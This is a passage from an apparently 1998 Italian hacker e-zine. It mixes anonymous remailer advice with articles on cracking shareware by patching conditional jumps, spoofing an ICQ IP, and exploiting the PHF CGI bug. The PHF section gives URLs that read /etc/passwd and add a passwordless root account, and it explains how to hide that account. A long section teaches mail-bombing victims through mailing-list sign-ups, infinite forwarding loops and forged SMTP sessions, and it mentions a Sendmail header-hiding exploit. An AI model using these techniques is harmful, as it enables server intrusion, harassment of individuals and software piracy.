cifrati con pgp.Se poi volete lo schema da B ad A vi accontento: B->remailer1.1->remailer2.1->remailer3.1->nym server->remailer3->remailer2->remailer1->A Da notare che la catena di remailer per l'invio e quella per le ricezione posono essere differenti , e sarebbe meglio che cos fossero.Tenete sempre bene a mente che i remailer non accettano posta sopra una determinata dimensione , informatevi prima di usare 5 chiavi pgp e scoprire che i messaggi non sono stati inoltrati perch troppo grossi! Potete anche fare in modo che un messaggio che vi viene inviato al nym server segua due o pi catene di remailer , in modo che abbiate la sicurezza che anche se una catena di remailer fosse down il messaggio vi arriverebbe comunque.Piccolo schema, limitato a 3 diverse catene , tanto per farvi una piccola idea dove X il nym server e Y siete voi, il vostro indirizzo mail reale: ->remailer1->remailer2->remailer3--\ / \ / \ X-->--->remailer4->remailer5->remailer6---------> Y \ / \ / ->remailer7->remailer8->remailer9--/ In questo modo i messaggi vi arriveranno quasi sicuramente, ma forse vi arriveranno anche in triplice copia , che meglio di nulla.In alternativa o in aggiunta potete anche specificare catene di remailer scelte fra tutte quelle che avete inviato nel vostro nym e delle quali avete impostato un indice di probabilit d'uso. Per ora direi che l'argomanto remailer stato aperto , adesso sta a voi decidere se vi serve un remailer o un nym server! Per informazioni pi dettagliate ed in italiano sulla crittografia in ogni sua forma leggetevi l'ottimo libro "Kriptonite" , mia seconda Bibbia , reperibile presso www.kyuzz.org/anon/kriptonite.html , mandate un messaggio a help@nym.alias.net , leggete tanto e sottoscrivetevi a alt.privacy.anon-server. Scusate se il contenuto troppo tecnico , ma la crtittografia studio, se volete essere sicuri delle vostre mail usate sempre pgp e una catena di remailer! Buone sperimentazioni, RigoR MorteM , CLub SpiPPoLaTorI 1998 , rigormortem@mindless.com ͻ Ŀ Se io sono io e tu 6 tu ki il + scemo tra noi 2 ??? ٺ ͼ Mi chiederete "ma non dovevi fare un articolo sul cracking?? Che questa specie di indovinello stupido???" ed io vi rispondo prontamente "aspettate....leggete.....e scoprirete!!". Lancio una rapida occhiata al clock del mio Winzozz....porco Gates, sono l' 1:30 A.M. ed ho appena incominciato!!!! Faccio un rapido calcolo di fuso orario e penso a ci che potrebbe fare in questo momento la mia pulzella virtuale nel suo emisfero australe e cerco ispirazione in una sua foto..... (*)(*) ) . ( ( v ) Bella non vero??? \ | / Inoltre sono reduce da un phreakin' assault notturno svolto ieri e sono assonnato come un maiale pakistano ma questa un'altra storia....magari in un prossimo articolo.... Mi ricordo ancora la 1 volta che ho crackato un gioco....era Larry 7 Love for Sail....copiai l'intero CD sull'H-D, aprii il file .bat di partenza con l'edit di Dos e lessi la stringa "cd path E:\" sostitu "E:\" con "C:\Larry" (dove Larry era la dir in cui avevo copiato il cd), e mi rantolai a terra sghignazzando come una iena Texana. Il gioco partiva senza cd ed io avevo crackato il mio 1 gioco!!!. Tutto questo per farvi capire come alle volte pu essere facile crackare.....ma non tutto oro ci che luccica!! Oggi vi spiegher come fare se volete far saltare un Cd-check per un gioco oppure registrare uno di quei bastardissimi shareware..... E' un metodo facilissimo, semplicissimo ed efficacissimo!!!!!!!! Come avrete notato ha un titolo un p strano ma abbiate fede nello zio Dante... ...tutto verr spiegato. Occorrente: 1 Win 32/16 Dasm....reperibile in rete 2 Hiew.....anche questo reperibile nella stessa locazione 3 Buona dose di puro culo....reperibile solo alla nascita purtroppo!!! Il metodo consiste in questo: Il Cd-check o il programma shareware esegue un cos detto Jump durante il controllo del cd, nel caso del gioco, della veridicit dell'user e pass, nel caso dello shareware. Cos' un Jump??? semplicemente un salto (non vi preoccupate il comp. non cercher di gareggiare con Fiona May) prodotto da una scelta del programma...un condizionale insomma. Che ne direste di modificarlo a nostro favore???? Ora vi spiego meglio..... E pur mi converr vincer la pugna!! Faccio partire uno shareware e decido di registrarlo, cosa devo fare??? Premo il solito pulsante per registrare (di solito lo trovate in help o qualcosa del genere) e mi appare una schermatina che mi dice "inserisci l' user e la pass" io digito rispettivamente come user e pass "Che" "Culo!!", ma il programma mi spara una cosa del tipo "Brutto bastardo hai inserito una pass sbagliata!!". In questo punto il proggie ha eseguito un jump : ha confrontato la pass e l'user con un algaritmo o con delle pass precedentemente inserite in memoria e si detto: se la pass giusta registra il programma, se la pass non giusta fai apparire il messaggio Ed proprio qu la succulenta idea: perch non invertire i jump in modo da avere.... se la pass non giusta registra il programma, se giusta fai apparire il messaggio SEMPLICE & GENIALE!!!!! Ecco spiegato il nome del metodo: inverto i nomi e te lo metto in culo!!! Disassembling A questo punto dato che la fortuna non dalla mia parte e la pass "che culo!!!" non ha funzionato decido di passare ai metodi duri.... Chiudo il programma e disassemblo il file .exe di partenza dello shareware con il Dasm subito clicko il pulsante Refs e poi String Data References. Vi apparir una finestra con una serie di stringhe.....fate doppio click su quella con la frase con cui vi aveva risposto il programma (Brutto bastardo hai inserito........), adesso spostandovi un p in sopra evideziate la linea in cui compare il jump condizionale Es. je 1034732 adesso segnatevi l'offset che non niente altro che quel numero che compare in basso sulla finestra del programma preceduto da @Offset Es. @Offset 0004B9E adesso potete chiudere il Dasm. Facciamo saltare il Jump!!! Adesso fate partire Hiew e seguite queste istruzioni.Premete: F1 per cambiare il drive e selezionare il file (ovviamente il .exe che avete deassemblato prima) F4 per selezionare il modo Decode F5 ed inserite l'Offset che vi siete segnati in precedenza Es. 0004B9E Adesso viene il bello.... Vi accorgerete di essere capitati su di una stringa in cui nella terza colonna c' lo stesso tipo di jump che avevate trovato prima e di cui vi eravate segnati l'Offset, attenzione per non dello stesso tipo..... proprio quello!!! Ora dovete invertire il jump e lo farete spingendo F3 ed inserendo nella seconda colonna ai primi 2 numeri al posto di 74 (je), 75(jne) oppure il contrario ovviamente.... Nel caso doveste trovare un jump diverso vi inserisco una intera lista di tutti i jump che potrete trovare nel mezzo del cammin della vostra Crack.... 77cb JA X8 Jump short if above (CF=0 and ZF=0) 73cb JAE X8 Jump short if above or equal (CF=0) 72cb JB X8 Jump short if below (CF=1) 76cb JBE X8 Jump short if below or equal (CF=1 or ZF=1) 72cb JC X8 Jump short if carry (CF=1) E3cb JCXZ X8 Jump short if CX register is 0 E3cb JECXZ X8 Jump short if ECX register is 0 74cb JE X8 Jump short if equal (ZF=1) 7Fcb JG X8 Jump short if greater (ZF=0 and SF=OF) 7Dcb JGE X8 Jump short if greater or equal (SF=OF) 7Ccb JL X8 Jump short if less (SF<>OF) 7Ecb JLE X8 Jump short if less or equal (ZF=1 or SF<>OF) 76cb JNA X8 Jump short if not above (CF=1 or ZF=1) 72cb JNAE X8 Jump short if not above or equal (CF=1) 73cb JNB X8 Jump short if not below (CF=0) 77cb JNBE X8 Jump short if not below or equal (CF=0 and ZF=0) 73cb JNC X8 Jump short if not carry (CF=0) 75cb JNE X8 Jump short if not equal (ZF=0) 7Ecb JNG X8 Jump short if not greater (ZF=1 or SF<>OF) 7Ccb JNGE X8 Jump short if not greater or equal (SF<>OF) 7Dcb JNL X8 Jump short if not less (SF=OF) 7Fcb JNLE X8 Jump short if not less or equal (ZF=0 and SF=OF) 71cb JNO X8 Jump short if not overflow (OF=0) 7Bcb JNP X8 Jump short if not parity (PF=0) 79cb JNS X8 Jump short if not sign (SF=0) 75cb JNZ X8 Jump short if not zero (ZF=0) 70cb JO X8 Jump short if overflow (OF=1) 7Acb JP X8 Jump short if parity (PF=1) 7Acb JPE X8 Jump short if parity even (PF=1) 7Bcb JPO X8 Jump short if parity odd (PF=0) 78cb JS X8 Jump short if sign (SF=1) 74cb JZ X8 Jump short if zero (ZF = 1) Spingete F9 per salvare il file ed ancora F9 per uscire da Hiew. AVETE CRACKATO LO SHAREWARE!!!!!!!!! Vuolsi cos col dove si puote ci che si vuole????? Adesso viene il momento decisivo....il verdetto....sarete stati cos bravi o fortunati da azzekare il giusto jump???C' solo un modo per scoprirlo.... Aprite lo shareware che avete appena crackato andate su register ed inserite la vostra pass scaramantica: la mia "Che" per l'user e "Culo!!!" per la pass con variante "Caxxo" "che" "culo!!!" nel caso di richiesta di un altro codice e sperate con tutti voi stessi di esserci riusciti.... A questo punto se avrete modificato il jump giusto apparir una roba del genere: "Registered" ed ora non vi resta che rantolare a terra in preda alle convulsioni per la felicit con la schiuma che vi esce dalla bocca..... by Dante Alighieri ͻ Ŀ COME SI DIVENTA HACKER IN POCHI SEMPLICI PASSI? ٺ ͼ Benvenuti a tutti gli hackers/crackers/phreakers/newbies o wannabe (e chi + ne ha + ne metta) quello che vi parla dal suo amato picci' e' N0bodY88 il cofondatore con Zerocool della crew, del sito e di questa e-zine. Questo testo e' stato scritto per essere letto dai newbies quindi se siete hacker o giu' di li' potete saltarlo tranquillamente. Prima di tutto sappiate che io sono solo un newbie e NON un hacker quindi se volete consigli su qualcosa scrivete pure a n0body88@freemail.it ma pliiiiiiis non mandate email del tipo: - come si buca la nasa? - come si fa a diventare hacker? Alla prima domanda non saprei come rispondere....e cmq ci tengo alle pal..ehm alla pelle.... Alla seconda domanda vi rispondo dalla e-zine xche per diventare hacker bastano poche basilari cose: 1) avere un picci su cui provare, tentare, cercar di riuscire, sperimentare, insomma ci siamo capiti ^__^ 2) conoscere uno o piu' linguaggi di programmazione, utile ma non essenziale all'inizio, poi piu' avanti si va meno si migliora senza nessun linguaggio... 3) avere uno o + ^__^ collegamenti a internet per navigare nella rete A questo punto cio' che contraddistingue un hacker da un utente qualsiasi quale e'? avere il bo o netbus? La differenza e' solo una: la sete di conoscenza, quell'irrefrenabile emozione che si prova quando si capisce qualcosa , la voglia di capire cio' che nessuno vuole capire ma che tutti vogliono usare. Un esempio classico e' il bo. Quanti di coloro che usano il bo saprebbero fare una backdoor loro? Pochi, triste ma vero. Io ho provato come molti altri non ho fatto il noBOdy ma almeno ho tentato ed e' venuta fuori la mia... mezza schifezza (+ che una backdoor era un semplice ping tra due form server e client su porta scelta all'inzio....ma mi ci sto mettendo dietro ^__^) Adesso mi direte ok ho il pc, conosco questo o quel linguaggio e sono collegato e ora? E ora direzionatevi su un motore di ricerca cercate "hacker" (ps: non scrivetemi per dire non ne trovo uno okki?). Fatto? Ok ora avrete davanti uno dei tanti siti hacker con le solite pagine ICQ, IRC, PROGRAMMAZIONE, TESTI, PROGRAMMI. La strada da seguire non e' PROGRAMMI (tanti la scelgono per primi) ma bensi' TESTI. Fatto ora avrete davanti decine se non centinaia di testi (99% in inglese) e non avete che la possibilita' di scegliere in cosa "specializzarvi" (phreak/crack/hack/virus/programmazione) avendo l'accortezza di non tentare di specializzarvi in phreaking leggendo qualche txt americani, poiche' tra qui e' li' cambiano molte cose (anche se potrei sabgliarmi xche non so niente di phreak)... Dopo aver letto + di 6/7 doc sullo stesso argomento provate a vedere se lo avete capito e se sapete usarlo/applicarlo/spiegarlo e se non va rileggeteli. Poi riprovate e se non va entrate in irc o in icq e chiedete a gente + esperta di voi se possono indirizzarvi in posti dove il problema e' spiegato meglio o se loro hanno il TEMPO di spiegarvi. OK? Io sono un newbie, e forse non saro' mai un hacker, ma se ho imparato una cosa in questi mesi in cui mi sono dato a questo...hobby ^__^ e' che se c'e' qualcuno in difficolta' lo si aiuta, altrimenti si andrebbe contro i principi dei VERI HACKER e dei newbies (questo discorso pero' non vale se questo qualcuno [ps: a me non e' mai successo, quindi non ho di questi problemi ^__^] fa domande tipo "mi insegni come diventare hacker?" ...sinceramente quanti di noi newbies hanno letto il txt dentro allo zip di bo prima di chiedere come si usa?). Ora navigate, leggete, provate, leggete, provate e se diventate MITICI allora potete passare a linux o unix e li' cominciate con i consigli di zerocool sopra scritti.... Spero che questo articolo sia letto dalle decine di newbie che postano domande inutili e senza aver letto i post precedenti sulle news e ricordatevi: newbies si nasce, hacker si diventa (imo). ^__^ N0bodY88 ps: se tutto questo vi sembra una stronzata.... liberi di pensarlo :-) pss: se siete gia' nella "scena"(ue' che parolone!) come non sono (ancora...si spera!) io allora capirete che nulla e' facile come scritto nel titolo... ͻ Ŀ COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO) ٺ ͼ Cio' che scrivo qui e' solo il riassunto e la traduzione in italiano del doc fatto da Scru un hacker (credo) inglese o cmq estero. Prima di spiegarvi come fare a nascondere il vostro ip dai lameroni di turno devo prima mettervi in guardia che quando l'ho fatto io non mi andavano piu' le CHAT e il trasferimento di FILE. Operazioni da eseguire per fare in modo che il vostro ip agli altri appaia 127.0.0.1 o qualsiasi ip voi vogliate: Step 1: Cliccate sul bottone di ICQ. Step 2: Cliccate Preferences. Step 3: Cliccate sulla scritta Connection. Step 4: Selezionate "I am using a permanent internet connection (LAN). Step 5: Selezionate "I am behind a firewall". Step 6: Cliccate sul pulsante firewall settings. Step 7: Selezionate "I am using a socks4 proxy". Step 8: Cliccate sul pulsante next. Step 9: Inserite un IP falso nella casella di testo "SOCK4 Host:". Step 10: Cliccate sul pulsante next. Step 11: Cliccate il pulsante done. Step 12: Riavviate icq. Ora quando andrete on the net con icq chi vi guardera' l'ip trovera' il fake ip. Se volete riavere il vostro ip normale bastera': Step 1: Cliccate sul bottone di ICQ. Step 2: Cliccate Preferences. Step 3: Cliccate sulla scritta Connection. Step 4: Selezionate "I am using a modem". Step 5: Riavviate icq. N0bodY88 PS: qualcuno mi dica se i problemi con le chat e il trasferimento di file non va solo a me o anche ad altri ma cmq se non funziano anche a voi penso che non trovando il vero ip icq non riesce a trasferire i file e ad aprire chat xche il vostro amico/nemico tenta di connettersi a voi che non avete visualizzato il vostro vero ip, quindi..... PPS: provate a mettere come ip 127.0.0.1 come consigliato sopra che se trovate il lamerone giusto e' possibile che si autonuki (o come @zz si dice)! 0000000000000000000000000000000000000000000000000 0 0000000000000000 0 0 00000000000000 0 0 BUGGATI TU CHE MI BUGGO ANCH'IO 0 0 00000000000000 0 0 0000000000000000 0 ''''''''''''''']L0rD D3sTRuTi0N['''''''''''''''' -------------------------------------------------------------------------------- Materiale : 1 Lt di Coca cola finta (quella del discount) 1 Telefono che rompe il cazzo ogni 5 min... P.S. : PiGPeN se leggerai mai questo articolo scusa...ti ho copiato un po lo stile..;P Bhe, cominciamo... Allora vi parler dei bug che mezzo mondo conosce ma che alcuni appena entrati nel fantastico mondo dell'hacking non conoscono o non conosco fino in fondo. Se quello che scrivo vi fa schifo...bhe, mettetevi con la faccia sul cesso e infilatevi due dita in gola ;o= ''''''''''''''''''''''''''' '...oooOOO] PHF [OOOooo...' ''''''''''''''''''''''''''' Uno dei bug pi conosciuti al mondo quello del PHF... In pratica tramite il PHF si possono fare moltissime cose, come vedere il file passwd, aggiungere un account, modificare file e via dicendo, sta tutto nella vostra fantasia... Cominciamo col vedere come si usa questo PHF... Di cosa avete bisogno, be, le cose non sono molte : - 1 Web Browser - 1 Server con il PHF bacato ;P Allora mettete come indirizzo la seguete stringa : http://www.vittima.com/cgi-bin/phf?Qalias=X%0a/bin/cat%20/etc/passwd ...e premete invio. A questo punto se non avete fatto errori e se il PHF bacato otterrete un cat del file passwd, altrimenti se non lo ...un messaggio di errore. Ma con questa stringa possiamo fare tante altre cose, come ad esempio dare il comando "id" e vedere con che permessi gira il PHF, e se siamo un po fortunati potremo anche avere i permessi di root. Digitiamo : http://www.vittima.com/cgi-bin/phf?Qalias=X%0a/bin/id Se il server ci risponde una cosa del genere ... uid=0(root) gid=0(root) groups=0(root) ...allora potete cominciare a sentirvi Di0...il PHF gira con permessi root, quindi potete fare di tutto, dipende dalla vostra fantasia...ma ricordate, non cancellate mai nulla che non abbia a che fare con il vostro ip o con qualcosa che possa farvi rintracciare, ricordate che se distruggete un sistema, per me sarete sempre dei lamer merdosi.... Detto questo aggiungiamo un account al passwd passando al PHF il seguente comando : P.S. : ricordatevi che sul web lo spazio si rappresenta con la stringa %20 echo "hacker::0:0::/home/lor1:/bin/bash" >> /etc/passwd Et voila ! Avete aggiunto un account al file passwd e ora potete telnettarvi utilizzando l'account hacker senza password.... Ricordatevi di scegliere sempre nomi che non destino sospetti ed una volta entrati spostate il vostro account a met del passwd in modo da confonderlo con gli altri. Ok, spero che abbiate capito come funzica il PHF, ora sta alla vostra fantasia fare quello che volete... Controllate sempre il file /etc/inetd.conf per vedere quali servizi remoti sono attivi etc etc... Ok, Yo a tutti voi e ricordatevi "Think before hack, be an elite, not a stupid busted !!!" Ciao CyberFratelli !!!!!! P.S : Se questo articolo vi piace, o vi fa schifo o volete insulatarmi eccetera eccetera, mailate tutto a lord_dest@iname.com, vi risponder e vi insulter al pi presto };P ͻ Ŀ ------------Che---Bello----Emailizzarci---IN----CORO------------------ ٺ ͼ Conmsumo: (in 3 volte diverse) una fetta di pandoro (senza topicida) un bicchiere di Martiny Dry, un panino al crudo (ma perche' sono tornato dagli allenamenti) Tazza di latte a lunga conservazione con Frosties. Musica ascoltata:Sound Track di Quake 2, Bach, un programma su "6" Saluto: Lux, Eso, Lord Destruction, TiZiO, Ghimlet, Phroid, il papa' Mail Bombing!!! Allora, il mail bombing e' uno degli attacchi + utili e efficaci che si possono fare.... peccato che e' anche uno che, a seconda dei casi, puo' essere inutile, inefficace e AUTOLESIONISTA ! Mi sembra superfluo dire che, se vi sta' sul khazzo un SysAdmin di un server con una 1024K sotto, e gli mandate l'impossibile... lui nemmeno se ne accorgera', se viceversa a un vostro conoscente che vi sta' sul kazzo, gli iniziate a far trovare 5-6 mega di roba nella mailbox ogni giorno... penso sia ben + dannoso... se i 5-6 mega non bastano... bhe...questo file e' scritto apposta! ;) Allora, i metodi + conosciuti per fare mail bombing sono 3: Spam mode (lamer, inutile, lento, un suicidio) con Mailing List (bello, pulito, dannoso... senza dubbio una bella cosa :) Con grossi attach (da bello a potenzialmente immortale) Sebbene io disliko molto la mail bomb spam mode, volgio mostrare a tutti quanto sia INUTILE e BRUTTO questo attacco... allora, chi di voi per Windoze non ha mia avuto "divine ascension" o "X-mail" o altri programmini cazzosi che si trovano in giro? Prendiamo come esempio il "Divine Ascension 3", questo programma ti consente di inserire l'indirizzo falso del mittente, l'indirizzo della vittima, il titolo, il testo del messaggio e il numero di messaggi... cosa succede ? dopo che tu fai "send" inizia a spedire UNO A UNO i messaggi, in questo modo il tempo che ci metti tu a spedire i messaggi e' pressoche' simile a quello che ci mettera' lui a scaricarli... Ma non e' tutto... ecco come si presenta l'header del messaggio (o di uno dei 10000 messaggi) Return-Path: Received: from SMTP.della.vittima (host.della.vittima [19X.XX.XX.XXX]) by host.dello.spammer (8.8.4/8.8.8) with ESMTP id UAA23316 for ; Sat, 19 Dec 1998 20:28:57 +0100 Received: from userID@dello.spammer (root@host.spammer [XXX.XXX.XX.XXX]) by SMTP.della.vittima (8.8.5/8.8.5) with ESMTP id UAA20651 for ; Sat, 19 Dec 1998 20:37:21 +0100 (MET) Sender: spammer@lamer.it Message-ID: <367BA65D.E33EA336@host.spammer> Date: Sat, 19 Dec 1998 14:13:01 +0100 From: DIO Reply-To: cha.cazzo@rispondi.it Organization: POWER IN BOMB (lamer in prison! :) X-Mailer: Divine Ascension HellFire MIME-Version: 1.0 To: merdaccia Subject: la morte calera' su di te (e la multa su di me) References: <003e01be2a90$1392d640$6264f4c2@merdaccia> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-UIDL: cb2d553d863f0ce2536cae082e24aebc Come vedete, appare TUTTO di voi... manca solo la data di nascita... ma basta che c'e' l'IP e vi beccano. E' ancora + facile andare a chiedere chi sei, perche' li bello nel header c'e' il vostro server SMTP (e anche versione di sendmail ecc..ecc...) In generale, potete usare questi programmi (Divine, X-mail) per spedire la posta, nel caso vi stancasse di Microzoft Outlook. M41|_b0mB & M41|_1n6 L15t (mailbomb & mailing list) P.s. --> pensate che qui scriva qualcosa di utile? P.z. --> non e' vero, lo faccio solo per farvi P.x. --> consumare gli okki (c) Lux P.@. --> (sono pazzo, ma non ditelo a nessuna :) Mail bomb & Mailing List (2) Allora, come tutti sappiamo le mailing list, sono servizi abbastanza utili, anzi, utilissimi x l'informazione di massa! ma pensate a uno sfigato qualunque che si trova iscritto a 20 mailing list (20 solo perche' siete stati buoni con lui! ) senza sapere quali sono, come si deiscrive, di cosa parlano, e soprattutto, finche' non si "unsubscribe" continuera' a ricevere mail !!! Allora, c'e' da dire che il programma "AVALANCHE" MI SEMBRA facesse anche questo, ovvero l'iscrizione automatica a un bel po' di mailing list messaggiando al Majordomo l'iscrizione della vittima. Ah gia' e' una guida x Newbie... allora magari servono delle delucidazioni...: Le mailing list sono strutture che si appoggiano a un server, quando arriva un messaggio esso viene forwardato automaticamente a tutti gli iscritti della mailing list, per iscriversi alla mailing list (o per iscrivere un altro) bisogna mandare un messaggio a Majordomo@NOME.della.ML.domain con scritto: Subscribe [nome-lista] indirizzo@indirzzo.ping Normalmente, [nome-lista] va' in quelle mailing list con MOLTE mailing list, ma tutte con un solo Majordomo, questo perche' se ci sono: lista1@host11.it lista2@host22.it non ci possono essere + majordomi, cosi' l'iscrizione viene gestita solo da uno. Allora, dopo che ci si iscrive ad una ML arriva la risposta del Majordomo con scritto solitamente (se non avete sbagliato niente) SUBSCRIPRION SUCCESSIFUL !!! e poi dicono anche "for subscribe mail to Majordomo@cazzo.figa" no subject body: UNSUBSCRIBE [LISTA] mail@tua.it Ma se noi iscriviamo uno che NON vuole essere iscritto... mi sembra ovvio che non dovra' riceverlo ! Allora cosa si fa'? una persona ingeniosa lo trova subito... ma si diventa ingeniosi anche grazie all'esperienza, ed e' una cosa che a volte manca... :( Andate su www.iname.com o www.poboxes.com o un'altro server che dia free-email con il forward impostabile, createlo, e impostate l'indirizzo a cui viene forwardata la posta al vostro indirizzo, iscrivere l'idirizzo che forwarda (quello su iname o su poboxes) alla mailing list, NON QUELLO DELLA VITTiMA... ma allora voi direte: "Vecna Porko! ma che cazzo dici, in questo modo i messaggi delle 16436 mailing list a cui lo iscrivo arrivano a me! e che cazzo! mi bombardo da solo ???" vecna risponde paziente: "STA' CALM ! CASU' !" Voi dovete ricevere solo il messaggio di conferma dei majordomi, poi, cambiare l'indirizzo di forward con quello della vittima, e poi sorridere certi del male partorito. Nota --> conosco solo INAME e POBOXES che facciano il forward automatico, nOTA --> se voi ne conscete altri, vi sarei grato del li comunicate al n0t4 --> vecna@mail.com - tnx Allora, ora bisogna fare alcune precisazioni sulle mailing list... NON fare mailbombig sulle mailing list di tipo spam mode, fate attenzione che alcune mailing list concedono SOLO a quelli iscritti di postare dentro, non dite in lista che bombardate qualcuno, e poi, sempre, SIATE PARANOICI ! ma questa nota si adatta di + ad altre situazioni. Poi, difese delle mailing list... ALcuNE MAILinG LiST tiPO EuROHkacK COnCEDoNo SOlo L'iScRIzIoNe A Chi Ha UNa CertA ChiaVe, LoRo StessI La DaNNo, E la DanNo a TuTtI, ma E' Un'OPeraZIOne CHe coMPlIKa un Po Il LavorO, E perSONalmENTe, Non StareI li A PerDERe TEmpo Per Far MaLE AGli AltRi. ********* 0ggi non parlo di filosofia, ma nemmeno di hacking ************ Bhe, oltre quello, vi consiglio di cammuffare l'indirizzi emittente, e quello delle risposte, in modo che sembri che provenga dalla casella che usate per l'auto-forward, questo perche' alcune mailing list, non iscrivono un indirizzo diverso da quello della mail! Allora, per finire sta' minkiata sulle ML (la chiamo minkiata xke' e' lunga, ma indubbiamente efficace! ) avrei voluto darvi una lista di mailing list... purtroppo io ne seguo poche, e il cazzone che doveva darmi una lista + sostanziosa e' sparito... (ma potete usare Altavista (www.altavista.com)...eehh si, oggi non si usa il + fedelissimo motore di ricerca "http://astalavista.box.sk") Cmq se qualcuno di voi ha a casa Avalanche, trova una lista li' dentro. Fare i Cattivi........ Allora, questo metodo non l'ho incluso tra i primi 3, ma vi assicuro che e' il metodo + potente in assoluto, un vero attacco sopraffino, divino, potente, ma prima di ogni aggettivo va' specificato INFINITO !!! Allora, andate su www.iname.com o www.poboxes.com o un'altro server di forward (e ripeto che se ne sapete altri DITEMELO ) create 2 mail box, come esempio prendero' 123@123.123 e abc@abc.abc su 123@123.123 settate il forward a abc@abc.abc e in CC alla vittima su abc@abc.abc settate il forward a 123@123.123 e in CC alla vittima Mandate una mail a 123@123.123 o all'altra... sapete cosa succede... :) ovvero il + potente e infinito spam che si possa avere !!! Logicamente, saranno state previste delle difese da queste cose, o anche difese per il server sfruttato, per evitare di continuare a copiare mail continuamente da una sua directory a una sempre sua directory... queste difese, mai verificate, possono essere: !!-- >> Un server non concede il forward automatico a un'indirizzo << --!! !!-- >> dello stesso server. << --!! ??-- >> Un server cancella mail uguali dopo un certo numero << --?? Allora che si fa' ? stesso discorso della mente allenta, ma soprattutto violenta e perversa...ecc.../etc...e queste sono le soluzioni da me elucubrate: fare il forward tra E-mail di server diversi, una su iname. una su poboxes, una da un'altra parte, poi, per quelli capaci di usare PINE e ELM o XMAIL (Xmail programma di posta x Linux, non X-Mail o Extreme mail per fare inutile spam) puo' usare una shell account free tipo quelle di sdf.lonestar.org o cyberspace.org, o una shell non free, ma tradata su IRCNet canale #shell & #shells, ah dicevo... si possono impostare forward automatico e/o risposta automatica... allora, basta far il forvard automatico, e impostare in copia nascosta l'indirizzo della vittima anziche' /sended-mail (cartella della posta inviata) (questo e' utile anche per non raggiungere il size limit concesso dalla shell) inoltre il file .signature consiste nella scritta che verra' addata in coda al messaggio, quindi vi consiglio di mettere un bel file da 100K come signature, ma anche la grandezza e' poporzionale alla vostra bastardaggine, quindi se mettete 500K farete + danni, attenzione pero' a una cosa... server come iname, poboxes, lonestar ecc... danno un size limit per il messaggio, una cosa utilissima sarebbe trovare il modo per DIVIDERE I messaggi che superano i 60K, 100K, 10K ...in questo modo i danni sarebbero ancora maggiori. Inoltre la tecnica x dividere i messaggi puo' essere fantastica anche per un altro motivo... ma lo illustro con la prossima tecnica. M4iL B0mB Con SeN|)mail - 0 forse Con GroSsi 4TT4ch/Chiamatelo come volete Tratto + che altro da delle FAQ di Packet Storm of Security. Telnettatevi alla 25 di un server a caso, come sempre si consiglia di usare un server Filippino, Russo, Rumeno, Croato, Coreano ecc.../etc... mi raccomando, + lontano e' e + e' bello ;) Arrivati, vi troverete davanti alla solita procedura di utilizzo Sendmail, scrivete: HELO nomeserver.com (falso of course) MAIL FROM: RCPT TO: DATA e qui scriviamo il testo del messaggio, P.S. guardate che, pur inserendo un fake in HELO, i nuovi server prendono l'ip del reale sender e sbatterlo sull'header come primi recieved. altro pezzo di messaggio insulti correlati al motivo della mail bomb vecna declina ogni responsabilita' vi chiedo di usare il cervello, non serve fare queste cose per sentirsi + bravi, + hacker... no raga... non e' cosi' che si fa'. NO MAIL BOMB SE NON PER BUONI MOTIVI capito ? o devo ripetere? BUONI MOTIVI X FARE MAIL BOMB SONO POCHI. a menoche' non avete abbastanza conoscenze tecniche, coraggio, un gruppetto di amici e allestite un gruppo di crackers. altro pezzo di messaggio... ricordo che scrivo questo testo solo per l'informazione e per la sua liberta'... e ricordo che se ora sto' scrivendo e' perche' sono ancora sotto la funzione DATA di sendmail . QUIT infatti, quando si fa' invio e poi si digita il punto su una linea sola, succede che il testo del messaggio e' completo, e viene spedito. MA questa non e' una mail bomb vero ? e come si fa allora ? HELO morte.tua MAIL FROM:dio@paradise.net RCPT TO:lamish@victim.net REPLY:webmaster@microsoft.com CONNECT: latte.uth anonymous omonimous@server.porn BINARY GET /home/ftp/pub/immenso/immenso.tar.gz GET /home/httpd/index.html DATA testo msg . QUIT Spiegazio: REPLY e' l'indirizzo dove rispondere, CONNECT io non l'ho mai usato, ma sulle FAQ che ho trovato indicavano anche questo e per completezza l'ho messo. BINARY = tipo di file, credo, serve per specificare che il tipo di file sara' un file binario... forse anticipa a sendmail che dovra' usare MIME per l'attach... ...ma e' una cosa che credo io, l'utilita' di BINARY la ignoro. GET = attacch u file ! (consigliati file GROSSI ! ) mettendo + get vengono inviati + filez SVANTAGGI: il tuo ip rimane, quindi si deve fare solo dopo uno spoofaggio o un bounce. ALTRO SVANTAGGIO: il messaggio e' solo uno, anche se immenso. Come e' Bella Sendmailz!!! Come sono belli i suoi buki... quanti buki ci sono... Exploit vs Sendmail 8.8.8 = HELO HOLE (e qui c'e' pure il giuoco di parole :) Ma prima di introdurvi all'exploit della 8.8.8, qualche parola sulla moralita' del matrimonio, e il fatto che io sia la nemesi del mio Linux. ecco... -Sherlohk Holmes, che scuola hai fatto? -Elementare Watson, Elementare.... Tratto da :Manuale di Vecna agli exploit di Sendmail, a sua volta tratto da PSS. Questo e' un semplice sistema utilizzato per masherare o nascondere l'header dei messaggi. io stesso ho constatato coma alcuni server smtp riportino nell'header l'ip di colui che ha scritto il messaggio, cosi', in caso di eventuale mailbombing, possa essere rintracciato. nella libreria conf.h v definito: #define PICKY_HELO_CHECK 1 Questo pu forzare sendmail che per mezzo del syslog causerebbe un X-Authentication.Warning che apparirebbe nell'header. questo solo se il loglevel in sendmail.cf maggiore di 3 (anche se di default 9 :) >From spam@flooders.net Mon Jan 5 22:09:05 1998 Received: from xxxxxxxxxxxxxx... [infinite 'x'] ...xxxx Il resto l'ho tolto perche' ho saputo che gia' un'altra persona ha spiegato quest'exploit, su questa enzine spray nasale, quindi andate a leggere la sua sezione. (se per la volta prossima serve una raccolta di exploit contro sendmail prometto a tutti che la faro' ;) Implementazione: Da una shell, inviate un messaggio con in attach 2 o 3 volte il kernel, 2 o 3 volte qualcosa di grosso ecc... ecc... il vosto ip non appare (non appare, esatto), il messaggio e' uno e grosso, ma se riuscite a impostare il programma in modo che divida i messaggi superiori ai tot K con 10K "quanto dura irc?" --> "posso fare un mio canale" a questo punto poi farete la...ehm...il finto tonto dicendo "ma xche alcuni hanno uno strano simbolo a fianco del nome?" a questo punto l'op maschio in cerca di notorieta' dira' cose del tipo "ce l'hanno i capi del canale, chi lo comanda e decide tutto" e zac! con una frase del tipo "ma puo' averlo solo uno alla volta?" o del tipo "come posso fare ad averlo devo pagare?" il nostro bell'eroe dira' la magica frase che vi ricompensera' di 5 o 10 min buttati al vento facendo finta 